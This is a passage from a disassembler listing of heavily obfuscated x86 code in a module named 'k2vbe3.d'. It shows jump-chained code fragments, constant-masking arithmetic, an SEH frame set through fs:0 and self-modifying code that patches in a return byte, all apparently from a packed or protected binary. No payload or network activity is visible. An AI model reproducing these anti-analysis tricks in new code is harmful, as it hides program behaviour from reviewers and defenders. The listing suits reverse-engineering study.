; ---------------------------------------------------------------------------

loc_45A37C:				; CODE XREF: sub_453E9F-1099Fj
		jmp	loc_442EBB
; ---------------------------------------------------------------------------

loc_45A381:				; CODE XREF: sub_44945C-C961j
		jmp	loc_440AA3
; ---------------------------------------------------------------------------
		xor	ebx, 6BF3FA41h
		jnz	sub_4537DB
		sub	ebp, ecx
		test	esi, 0B611E14Ah
		jmp	loc_43F805
; ---------------------------------------------------------------------------

loc_45A39F:				; CODE XREF: sub_458F37:loc_457CF1j
		shl	ecx, 6
		mov	edi, eax
		shl	ebp, 1Fh
		xchg	edx, eax
		jmp	loc_44266B
; ---------------------------------------------------------------------------

loc_45A3AE:				; CODE XREF: k2vbe3.d:00442148j
		jz	loc_43DAAB
		jmp	loc_44B765
; ---------------------------------------------------------------------------

loc_45A3B9:				; CODE XREF: sub_454639:loc_43F2ADj
		cmp	dword ptr [ebp-4], 0
		jz	loc_455177
		jmp	loc_44A70B
; ---------------------------------------------------------------------------

locret_45A3C8:				; CODE XREF: sub_442C7E+Cj
		retn
; ---------------------------------------------------------------------------

loc_45A3C9:				; CODE XREF: sub_4523BE-14C8Cj
					; sub_43DFE1+CF52j
		jmp	loc_4574C8
; ---------------------------------------------------------------------------

loc_45A3CE:				; CODE XREF: k2vbe3.d:0044B501p
					; k2vbe3.d:0045363Cj
		xchg	ecx, [esp+10h+var_10]
		pop	ecx
		xchg	ecx, [esp+0Ch+var_C]
		mov	ebx, ecx
		pop	ecx
		or	ebx, 961AB3A5h
		xor	ebx, 0BEB66E07h
		jmp	loc_4414FC
; ---------------------------------------------------------------------------

loc_45A3E9:				; CODE XREF: sub_4573B7:loc_445311j
		mov	eax, esi
		pop	esi

loc_45A3EC:				; CODE XREF: sub_44FF34:loc_455637j
		xor	eax, 0AED64189h
		add	eax, 783E981Ah
		xchg	eax, [esp+4+var_4]
		jmp	loc_44AC7F
; ---------------------------------------------------------------------------

loc_45A400:				; CODE XREF: sub_43E135:loc_44F8B8j
		jnz	loc_44AC99
		jmp	loc_44562C
; ---------------------------------------------------------------------------

loc_45A40B:				; CODE XREF: sub_44921C:loc_451D03j
		jz	loc_44676A
		jmp	loc_459C6B
; ---------------------------------------------------------------------------

loc_45A416:				; CODE XREF: k2vbe3.d:00445462j
		sub	eax, esi
		pushf
		rol	ebx, 5

loc_45A41C:				; CODE XREF: k2vbe3.d:loc_445456j
		sub	edx, 0D3EBE700h
		cmp	edx, 0C3E43B5Fh
		jmp	loc_45428A
; ---------------------------------------------------------------------------

loc_45A42D:				; CODE XREF: sub_45830D-11877j
		mov	[edi], ecx
		cdq

loc_45A430:				; CODE XREF: sub_45830D:loc_446B87j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_43C8B4
; ---------------------------------------------------------------------------
		mov	ebx, 6CDB7A99h
		jmp	sub_44E2A4
; ---------------------------------------------------------------------------

loc_45A445:				; CODE XREF: sub_44D298:loc_45A522j
		mov	[ebp-8], eax
		push	0C845EFAh
		ror	eax, 4
		jmp	loc_44869E
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Bh
		mov	ds:dword_44DA54, eax
		retn
; ---------------------------------------------------------------------------

loc_45A460:				; CODE XREF: sub_4487ED+Aj
		jmp	locret_450B25
; ---------------------------------------------------------------------------

loc_45A465:				; CODE XREF: sub_45A323j
		push	ebp
		mov	ebp, esp
		jmp	loc_44BAF3
sub_45A323	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jo	loc_44DF2E
		jmp	sub_444A1A
; ---------------------------------------------------------------------------

loc_45A478:				; DATA XREF: sub_43FCA0+F331o
		push	0BCC5EB10h
		pop	ebx
		and	ebx, 0FC3E4192h
		sub	ebx, 1ADF307Dh
		xor	ebx, 0EC099A93h
		or	ebx, 0F22E95AAh
		jmp	loc_458632
; ---------------------------------------------------------------------------

loc_45A49B:				; CODE XREF: k2vbe3.d:loc_4502B5j
		jz	nullsub_348
		jmp	loc_4415C4
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44DB57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45A4AC:				; CODE XREF: sub_4467A1:loc_44AA15j
		cmp	eax, 79E905D5h
		jmp	loc_4545B3
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------

loc_45A4B7:				; CODE XREF: k2vbe3.d:00449269j
		mov	esi, eax
		xchg	esi, [esp]
		jmp	loc_45A705

; =============== S U B	R O U T	I N E =======================================



sub_45A4C1	proc near		; CODE XREF: sub_442DDF+3j

; FUNCTION CHUNK AT 0043CB15 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441D28 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045000A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045495D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458157 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045BC0F SIZE 0000000B BYTES

		add	esp, 0FFFFFFE0h
		lea	eax, [ebp-20h]
		mov	dword ptr [eax], 594C4C4Fh
		push	2F80332Dh
		pop	eax
		jmp	loc_451C4C
sub_45A4C1	endp


; =============== S U B	R O U T	I N E =======================================



sub_45A4D8	proc near		; DATA XREF: sub_4535BC+Do

; FUNCTION CHUNK AT 0043D523 SIZE 00000005 BYTES

		pop	ecx
		jmp	loc_43D523
sub_45A4D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450359

loc_45A4DE:				; CODE XREF: sub_450359+4j
		test	byte ptr [ebp-8], 2
		call	sub_44416D

loc_45A4E7:				; CODE XREF: sub_447383-6D93j
		jmp	loc_4572CF
; END OF FUNCTION CHUNK	FOR sub_450359
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_341. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_45A4ED:				; CODE XREF: sub_44D0D5+1039j
		jmp	loc_4475F9
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_45A4F2:				; CODE XREF: sub_458BA9-17C1Cj
		jmp	sub_4563FD
; END OF FUNCTION CHUNK	FOR sub_458BA9
; ---------------------------------------------------------------------------

loc_45A4F7:				; CODE XREF: k2vbe3.d:loc_4417D5j
		jnz	loc_45955D
		jmp	loc_43E2A8

; =============== S U B	R O U T	I N E =======================================



sub_45A502	proc near		; CODE XREF: k2vbe3.d:00440A6Ap
					; k2vbe3.d:00455909j

; FUNCTION CHUNK AT 0044A0B7 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	offset sub_4511CE
		jmp	loc_44A0B7
sub_45A502	endp

; ---------------------------------------------------------------------------

loc_45A511:				; CODE XREF: k2vbe3.d:loc_44D829j
		jnz	loc_44D171
		jmp	loc_43CBD4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A51D:				; CODE XREF: k2vbe3.d:0044E428j
		jmp	loc_4461B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_45A522:				; CODE XREF: sub_44D298:loc_44B7F7j
		jmp	loc_45A445
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_45A527:				; CODE XREF: sub_447692:loc_43C02Bj
		push	offset loc_453854
		jmp	nullsub_375
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_45A531:				; CODE XREF: sub_4432B0:loc_4525A2j
		xchg	eax, [edx]
		xchg	ecx, eax
		jmp	loc_440346
; END OF FUNCTION CHUNK	FOR sub_4432B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_314. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_45A53B:				; CODE XREF: sub_452CF7+4j
		push	edi
		mov	edi, ebp
		xchg	edi, [esp+0]
		mov	ebp, esp
		call	sub_44B999

loc_45A548:				; CODE XREF: k2vbe3.d:0044F0D5j
		jge	loc_43C47A

loc_45A54E:				; CODE XREF: sub_43C3A9+115A0j
		jmp	loc_4479F3
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
		jbe	sub_43DADB
		cmp	ebp, 4D3EF189h
		jmp	loc_43C46A
; ---------------------------------------------------------------------------

loc_45A564:				; DATA XREF: sub_44B39A+6o
		pop	edx
		mov	eax, [esp]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_4599AA
		mov	eax, 0DA4431C0h
		jmp	loc_450E27
; ---------------------------------------------------------------------------

loc_45A57D:				; CODE XREF: k2vbe3.d:loc_452B35j
		jz	loc_44AAA8
		jmp	loc_447793
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45A588:				; CODE XREF: sub_45A323-B6AFj
					; sub_45A323-980Aj
		xor	edx, 0AE0E8E91h
		jnz	loc_456FCB

loc_45A594:				; CODE XREF: sub_459E22+14j
		jmp	loc_43EB2F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_45A599:				; CODE XREF: sub_440C94:loc_44FF55j
		jmp	loc_4523E6
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		jnz	loc_4570D8
		cdq
		jmp	loc_44E156
; ---------------------------------------------------------------------------

loc_45A5AA:				; CODE XREF: k2vbe3.d:0044D8C3j
		test	edx, ecx
		jmp	loc_443134
; ---------------------------------------------------------------------------
		or	ebx, 376A7A19h
		jmp	loc_44C796
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_45A5BC:				; CODE XREF: sub_45A21D-8E7Bj
		pop	ecx
		call	sub_44EB3F
; END OF FUNCTION CHUNK	FOR sub_45A21D
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_45A5C2:				; CODE XREF: sub_4408BD+C686j
		or	eax, 0EEEA9285h
		xor	eax, 8F5144EFh
		cmp	eax, 14F6E01Ch
		jmp	loc_44D156
; END OF FUNCTION CHUNK	FOR sub_4408BD

; =============== S U B	R O U T	I N E =======================================



sub_45A5D9	proc near		; CODE XREF: sub_450158p
					; k2vbe3.d:00454840j
		xchg	ebx, [esp+0]
		pop	ebx
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		mov	eax, [eax]
		jmp	loc_45B1E4
sub_45A5D9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45A5F2:				; CODE XREF: sub_44921C:loc_4551F1j
		xor	ecx, ebp
		jmp	loc_44CD9B
; END OF FUNCTION CHUNK	FOR sub_44921C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_295. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_45A5FA:				; CODE XREF: sub_43CCD0+13F6Ej
		jmp	loc_4552FF
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_45A5FF	proc near		; CODE XREF: k2vbe3.d:004464ACj
					; k2vbe3.d:0045A2FEp

; FUNCTION CHUNK AT 00440169 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D7E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457321 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 84EA0E41h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44CA05
		jmp	loc_44FE24
sub_45A5FF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41E094, eax
		lea	eax, loc_44EAFD
		mov	byte ptr [eax],	0C3h
		jmp	loc_44EAFD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_45A62C:				; CODE XREF: sub_43D31B+117E3j
		mov	eax, [esp+0]
		jmp	loc_45A7ED
; END OF FUNCTION CHUNK	FOR sub_43D31B

; =============== S U B	R O U T	I N E =======================================



sub_45A634	proc near		; DATA XREF: sub_441F56+3o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C898 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043CE6C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442BD0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044A40D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A9EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E0D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456E65 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045BE9C SIZE 0000000F BYTES

		xchg	ebp, [esp+0]
		push	2353BADEh
		xchg	ecx, [esp+4+var_4]
		mov	esi, ecx
		pop	ecx
		rol	esi, 6
		or	esi, 0FD5A54FCh
		jmp	loc_456E65
sub_45A634	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FAE2

loc_45A650:				; CODE XREF: sub_43FAE2+7j
		mov	eax, [ebp-0Ch]
		mov	[ebp-1Ch], eax
		lea	eax, [ebp-125h]
		mov	[ebp-20h], eax

loc_45A65F:				; CODE XREF: sub_446CCF:loc_44AD82j
		mov	eax, [ebp-1Ch]
		jmp	loc_455689
; END OF FUNCTION CHUNK	FOR sub_43FAE2
; ---------------------------------------------------------------------------

loc_45A667:				; CODE XREF: k2vbe3.d:00458941j
		sbb	ebp, 0DC9E2D0Ah
		jmp	loc_449D88
; ---------------------------------------------------------------------------

loc_45A672:				; CODE XREF: k2vbe3.d:0044C655j
		pop	ebx
		call	sub_4487D2
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_45A678:				; CODE XREF: sub_43C82E-CFj
		jmp	loc_448DAC
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_45A67D	proc near		; DATA XREF: sub_44B44A+8861o
		push	ecx
		push	928A5BE7h
		pop	ecx
		xor	ecx, 6C97EEAh
		or	ecx, 4AFC62EDh
		add	ecx, 214596D9h
sub_45A67D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_449372

loc_45A696:				; CODE XREF: sub_449372:loc_450E8Ej
		jmp	loc_4491CD
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_45A69B	proc near		; DATA XREF: sub_444B3E+208Eo

; FUNCTION CHUNK AT 00451502 SIZE 00000008 BYTES

		add	edi, 0EB8636B6h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_431
		jmp	loc_451502
sub_45A69B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A6AF:				; CODE XREF: k2vbe3.d:0044833Ej
		xor	edx, eax

; =============== S U B	R O U T	I N E =======================================



sub_45A6B1	proc near		; CODE XREF: sub_442C22+FAF2p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044D57B SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		popf
		xchg	edx, [esp-8+arg_4]
		jmp	loc_44D57B
sub_45A6B1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xor	eax, 0DC5CC9F6h
		jmp	loc_44C0EF
; ---------------------------------------------------------------------------

loc_45A6C9:				; DATA XREF: k2vbe3.d:00446FDFo
		xor	edx, 2F103349h
		call	sub_45B20A
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		jmp	loc_453BB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B58F

loc_45A6DF:				; CODE XREF: sub_44B58F+A4B0j
		rol	ecx, 17h
		add	ecx, 3FF735E9h
		add	eax, ecx
		pop	ecx
		mov	edi, [eax]
		add	eax, 4
		mov	esi, [eax]
		jmp	loc_43CE49
; END OF FUNCTION CHUNK	FOR sub_44B58F
; ---------------------------------------------------------------------------
		and	ecx, 0CB56AFDCh
		jmp	sub_4405F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_45A702:				; CODE XREF: sub_444297:loc_447C61j
		xchg	esi, [esp+4+var_4]

loc_45A705:				; CODE XREF: k2vbe3.d:0045A4BCj
		mov	eax, [ebp-8]
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		jmp	loc_43F533
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45A713:				; CODE XREF: sub_44ED3C:loc_440191j
		xchg	eax, [esp+0]
		call	sub_457E9C
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_45A71B:				; CODE XREF: sub_44E481+5405j
					; sub_44E481:loc_45699Aj
		push	176CC65Eh
		pop	eax

loc_45A721:				; CODE XREF: k2vbe3.d:0043F249j
		or	eax, 4BDD5FCh
		add	eax, 0EBE475BFh
		add	eax, ebp
		add	eax, 0FC1DB23Fh
		jmp	loc_452A39
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------

locret_45A73A:				; CODE XREF: k2vbe3.d:00450474j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445143

loc_45A73B:				; CODE XREF: sub_445143+7j
		jmp	sub_44367E
; END OF FUNCTION CHUNK	FOR sub_445143
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_45A741:				; CODE XREF: sub_4597AE-9567j
		jmp	loc_440D5F
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
		mov	ebp, 0DC32E818h
		jmp	loc_45A2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_45A750:				; CODE XREF: sub_441172:loc_43C848j
					; sub_441172-4912j
		or	ebx, 0C1403A24h
		xor	ebx, 8F02F2D3h
		rol	ebx, 3
		add	ebx, 0CD75377Bh
		xchg	ebx, [esp+0]

loc_45A768:				; CODE XREF: sub_45A323:loc_45210Fj
		jmp	loc_44FFEB
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
		mov	edx, 0CB39536Bh
		call	sub_45B20A
		mov	[ebp-4], eax
		jmp	loc_457C95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_45A77F:				; CODE XREF: sub_44F028:loc_454DF5j
					; sub_44F028+88C2j
		mov	eax, [ebp-18h]
		mov	eax, [eax]
		shl	eax, 3
		push	ebx
		jmp	loc_443677
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45A78D:				; CODE XREF: sub_454E83:loc_44E8AFj
		and	eax, 0E2738B38h
		js	loc_43FBDC

loc_45A799:				; CODE XREF: sub_44C990+Fj
		jmp	loc_43C316
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
		test	esi, edx
		jmp	loc_43FBD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D942

loc_45A7A5:				; CODE XREF: sub_43D942:loc_4432ABj
		push	offset loc_446DC8
		jmp	nullsub_509
; END OF FUNCTION CHUNK	FOR sub_43D942
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_43CD74
		jmp	loc_456221
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_45A7BC:				; CODE XREF: sub_441409:loc_456531j
		pop	ebx
		xor	ebx, 76EF4359h
		add	ebx, 799681Ch
		push	offset loc_4415B0
		jmp	nullsub_380
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		pop	edx
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		mov	ds:dword_43C810, edx
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_45A7E0:				; CODE XREF: sub_4553CC:loc_44D30Bj
					; sub_4553CC+Ej
		xchg	eax, edx
		call	sub_45B20A
		retn
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_45A7E7:				; CODE XREF: k2vbe3.d:loc_449FD5j
		jl	loc_448007
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_45A7ED:				; CODE XREF: sub_43D31B+1D314j
		jmp	loc_459D30
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
		jle	loc_45803F
		and	esi, ebx
		sub	eax, ebx
		rol	edi, 1Dh
		jmp	loc_455AB8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_45A804:				; CODE XREF: sub_43F34C+183Aj
		test	esi, ecx
		jmp	loc_4534A2
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_45A80B:				; CODE XREF: sub_43FA2C:loc_4414E0j
		not	esi
		ror	ecx, 12h
		sub	edx, ecx
		jmp	loc_44F1ED
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_45A817:				; CODE XREF: sub_443FC1:loc_43E3D5j
		and	edx, 259C5A7Fh
		add	edx, 315FB4h
		xchg	edx, [esp+0]
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		push	esi
		push	offset loc_441D96
		jmp	loc_4594D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EA2

loc_45A836:				; CODE XREF: sub_440EA2:loc_455606j
		sub	eax, 0F099C266h
; END OF FUNCTION CHUNK	FOR sub_440EA2
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_45A83C:				; CODE XREF: sub_45512F-EF4Dj
		or	eax, 0AF891B6Fh
		add	eax, 404C2E9Ah
		xchg	eax, [esp+0]
		jmp	loc_449E21
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4FF

loc_45A850:				; CODE XREF: sub_44D4FF:loc_45558Bj
		add	ebx, 404A4D1Dh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44D4FF
; ---------------------------------------------------------------------------

loc_45A85E:				; CODE XREF: k2vbe3.d:loc_43F9D8j
		or	edx, 55A1D3FDh
		xor	edx, 0AD4D6DE4h
		call	sub_45B20A
		push	offset loc_457ADB
		jmp	locret_4514D7
; ---------------------------------------------------------------------------
		or	ecx, eax
		jmp	sub_448735
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_45A880:				; CODE XREF: sub_447E07:loc_455978j
		pop	eax
		sub	eax, 65E8DAA4h
		and	eax, 27163CA9h
		add	eax, 3F547676h
		add	eax, ebp
		add	eax, 9D9B84DDh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_4492CB
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_45A8A5:				; CODE XREF: k2vbe3.d:loc_44D58Aj
		push	offset sub_4565F8
		jmp	locret_45590E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_45A8AF:				; CODE XREF: sub_44863D:loc_448656j
		pop	edi
		or	edi, 0FBFF92B7h
		add	edi, 8AE4CDF9h
		jb	loc_44FBF9
		or	ebx, 3F33F0E2h
		jmp	loc_456CAC
; END OF FUNCTION CHUNK	FOR sub_44863D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_45A8CD:				; CODE XREF: sub_43C3A9:loc_44D8A0j
		or	eax, ecx
		pushf
		sbb	ecx, 0C3157620h
		jmp	loc_451D46
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
		not	edx
		rol	edi, 1Fh
		jmp	sub_44DC2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B454

loc_45A8E5:				; CODE XREF: sub_45B454-10348j
		jz	loc_44FFBE
		jmp	loc_451DEA
; END OF FUNCTION CHUNK	FOR sub_45B454
; ---------------------------------------------------------------------------
		jmp	ds:off_41E08C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F92

loc_45A8F6:				; CODE XREF: sub_440F92+15j
		jmp	loc_4525E4
; END OF FUNCTION CHUNK	FOR sub_440F92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_45A8FB:				; CODE XREF: k2vbe3.d:loc_44819Ej
					; sub_44AD65+Dj ...
		jb	loc_449FA3
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_454E83
		jmp	loc_4553C6
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_45A910:				; CODE XREF: sub_447266:loc_43FF29j
		jl	loc_43FCFC
		mov	eax, 5109BD40h
		sub	ebx, ecx
		cmp	ecx, 9FE30FBh
		jmp	loc_451343
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_45A928:				; CODE XREF: sub_453347:loc_458689j
		sub	esi, 64AC8A35h
		and	esi, 21D168ACh
		add	esi, 0FF7E97D4h
		xchg	esi, [esp+0]
		push	0FFFFFFFFh
		push	0
		call	sub_43F26C
		jmp	loc_455585
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------

loc_45A94B:				; CODE XREF: k2vbe3.d:loc_45135Bj
		sbb	ebp, edi
		jmp	loc_44C542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_45A952:				; CODE XREF: sub_44A6BD:loc_4505BAj
		mov	esi, edx
		xchg	esi, [esp+0]
		push	0DBF1DCC5h
		pop	edx
		and	edx, 39301EB6h
		jmp	loc_441768
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_45A968:				; CODE XREF: sub_455C7A+Fj
		mov	[ebp-14h], eax
		mov	eax, [ebp-14h]
		jmp	loc_43C780
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_45A973:				; CODE XREF: sub_44B912:loc_43EB2Fj
		xor	eax, eax
		push	esi
		push	2C929414h
		jmp	loc_4432CB
; END OF FUNCTION CHUNK	FOR sub_44B912

; =============== S U B	R O U T	I N E =======================================



sub_45A980	proc near		; DATA XREF: k2vbe3.d:0044A52Fo

; FUNCTION CHUNK AT 00456CA2 SIZE 0000000A BYTES

		and	eax, ecx
		xor	ecx, ebp
		jmp	loc_456CA2
sub_45A980	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBB2

loc_45A989:				; CODE XREF: sub_44FBB2:loc_45BFF0j
		pop	ecx
		ror	ecx, 0Ch
		jmp	loc_45ADB6
; END OF FUNCTION CHUNK	FOR sub_44FBB2

; =============== S U B	R O U T	I N E =======================================



sub_45A992	proc near		; CODE XREF: sub_44C90E+1C85p
					; k2vbe3.d:00452A0Fj
		xchg	eax, [esp+0]
		pop	eax
		push	8FAC6656h
		pop	ebx
		and	ebx, 14C7754Fh
		cmp	ebx, 35049B0Dh
		jmp	loc_44E598
sub_45A992	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A9AD:				; CODE XREF: k2vbe3.d:0044D66Fj
		jns	loc_454422

; =============== S U B	R O U T	I N E =======================================



sub_45A9B3	proc near		; CODE XREF: sub_456541-A42Dp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EE23 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043F041 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004460B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B3AA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450448 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450992 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045321A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454A07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456F21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004589AA SIZE 00000010 BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		cmp	dword ptr [ebp-10h], 0
		call	sub_44D316

loc_45A9C0:				; CODE XREF: sub_452941+Ej
		jmp	loc_44B3AA
sub_45A9B3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_45A9C5:				; CODE XREF: sub_44DD31:loc_4460C2j
		push	offset sub_43F8B8
		jmp	loc_44F086
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
